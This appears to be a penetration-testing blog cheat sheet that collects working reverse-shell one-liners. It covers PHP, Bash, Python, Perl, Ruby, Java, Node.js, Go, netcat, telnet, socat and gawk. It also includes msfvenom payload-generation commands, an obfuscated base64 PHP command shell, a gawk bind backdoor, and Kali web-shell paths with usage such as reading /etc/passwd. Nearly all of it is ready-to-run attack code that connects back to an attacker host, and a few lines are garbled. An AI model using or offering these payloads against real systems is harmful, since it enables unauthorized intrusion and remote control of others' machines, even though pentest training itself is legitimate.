During penetration testing if you’re lucky enough to find a remote command execution vulnerability, you’ll more often than not want to connect back to your attacking machine to leverage an interactive shell.

Below are a collection of Windows and Linux reverse shells that use commonly installed programming languages PHP, Python, Powershell, nc (Netcat), JSP, Java, Bash, PowerShell (PS). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.

If you found this resource usefull you should also check out our penetration testing tools cheat sheet which has some additional reverse shells and other commands useful when performing penetration testing.

What is a Reverse Shell

A reverse shell is code placed on a target server that when executed attemts to “connect back” to your listening netcat on your attacking machine. A reverse shell is often also referred to as a revshell.

NOTE: Working Reverse Shells

The revshells on this page are tested working when they are added to the cheat sheet.

08/06/2024 - Added addition PHP reverse shell one liner + msfvenom + house keeping. 25/02/2022 - House keeping 17/09/2020 - Updated to add the reverse shells submitted via Twitter @JaneScott 29/03/2015 - Original post date

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back, a simple way to do this is using a cloud instance / VPS - Linode is a good choice as they give you a direct public IP so there is no NAT issues to worry about or debug, you can use this link to get a $100 Linode voucher.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the following:

root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
NAT requires a port forward

If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the attacking machines IP / Port.

ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).

PHP Reverse Shell

The following section contains PHP reverse shells that have been tested working.

A simple PHP reverse shell:

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)

PHP Reverse Shell One Liner

A short one line reverse PHP shell (that was submitted via Twitter):

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

Short One Liner PHP Reverse Shell

Another short oneliner PHP Revshell:

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/ATTACKING-IP/1234 0>&1'");

Base64 PHP Shell

Base64 encoded PHP Shell by @0xInfection:

<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

MSFVenom PHP Reverse Shell

MSFVenom can be used to generate a PHP revsell using the following command:

msfvenom -p php/meterpreter_reverse_tcp LHOST=ATTACKING-IP LPORT=443 -f raw > reverse-shell.php

Another excellent PHP shell that I have personally used MANY times is the Pentest Monkey reverse shell that can be downloaded from their GitHub here: https://github.com/pentestmonkey/php-reverse-shell

ASP Reverse Shell

MSFVenom can be leveraged to generate an ASP reverse shell.

How to generate an ASP Reverse Shell with MSFVenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKING-IP LPORT=443 -f asp > rev-shell.asp

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

MSFVenom Bash Reverse Shell

MSFVenom can be used to generate a Bash revsell using the following command:

msfvenom -p cmd/unix/reverse_bash LHOST=ATTACKING-IP LPORT=443 -f raw > reverse-shell.sh

socat Reverse Shell

Source: @filip_dragovic

socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &

Golang Reverse Shell

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

Netcat Reverse Shell

Useful netcat reverse shell examples:

Don't forget to start your listener, or you won't be catching any shells :) 

nc -lnvp 80
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

A reverse shell submitted by @0xatul which works well for OpenBSD netcat rather than GNU nc:

mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Node.js Reverse Shell

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

Source: @jobertabma via @JaneScott

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

MSFVenom Perl Reverse Shell

MSFVenom can be used to generate a Perl reverse sell using the following command:

msfvenom -p cmd/unix/reverse_perl LHOST=ATTACKING-IP LPORT=443 -f raw > reverse-shell.pl

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

MSFVenom Python Reverse Shell

MSFVenom can be used to generate a Python reverse shell using the following command:

msfvenom -p cmd/unix/reverse_python LHOST=ATTACKING-IP LPORT=443 -f raw > reverse-shell.py

JSP Reverse Shell

MSFVenom can be used to generate a JSP reverse shell using the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKING-IP LPORT=443 -f raw > reverse-shell.jsp

WAR Reverse Shell

MSFVenom can be used to generate a WAR reverse shell using the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKING-IP LPORT=443 -f war > reverse-shell.war

Gawk Reverse Shell

Gawk one liner rev shell by @dmfroberson:

gawk 'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'
#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

Kali Web Shells

The following shells exist within Kali Linux, under /usr/share/webshells/ these are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

Kali PHP reverse shells and command shells:

Command Description

/usr/share/webshells/php/
php-reverse-shell.php

Pen Test Monkey - PHP Reverse Shell

/usr/share/webshells/
php/php-findsock-shell.php

/usr/share/webshells/
php/findsock.c

Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80

/usr/share/webshells/
php/simple-backdoor.php

PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-
backdoor.php?cmd=cat+/etc/passwd

/usr/share/webshells/
php/php-backdoor.php

Larger PHP shell, with a text input box for command execution.
Tip: Executing Reverse Shells

The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

Kali perl reverse shell:

Command Description

/usr/share/webshells/perl/
perl-reverse-shell.pl

Pen Test Monkey - Perl Reverse Shell

/usr/share/webshells/
perl/perlcmd.cgi

Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

Kali Coldfusion Shell:

Command Description

/usr/share/webshells/cfm/cfexec.cfm

Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

Classic ASP Reverse Shell + CMD shells:

Command Description

/usr/share/webshells/asp/

Kali ASP Shells

Kali ASPX Shells

ASP.NET reverse shells within Kali:

Command Description

/usr/share/webshells/aspx/

Kali ASPX Shells

Kali JSP Reverse Shell

Kali JSP Reverse Shell:

Command Description

/usr/share/webshells/jsp/jsp-reverse.jsp

Kali JSP Reverse Shell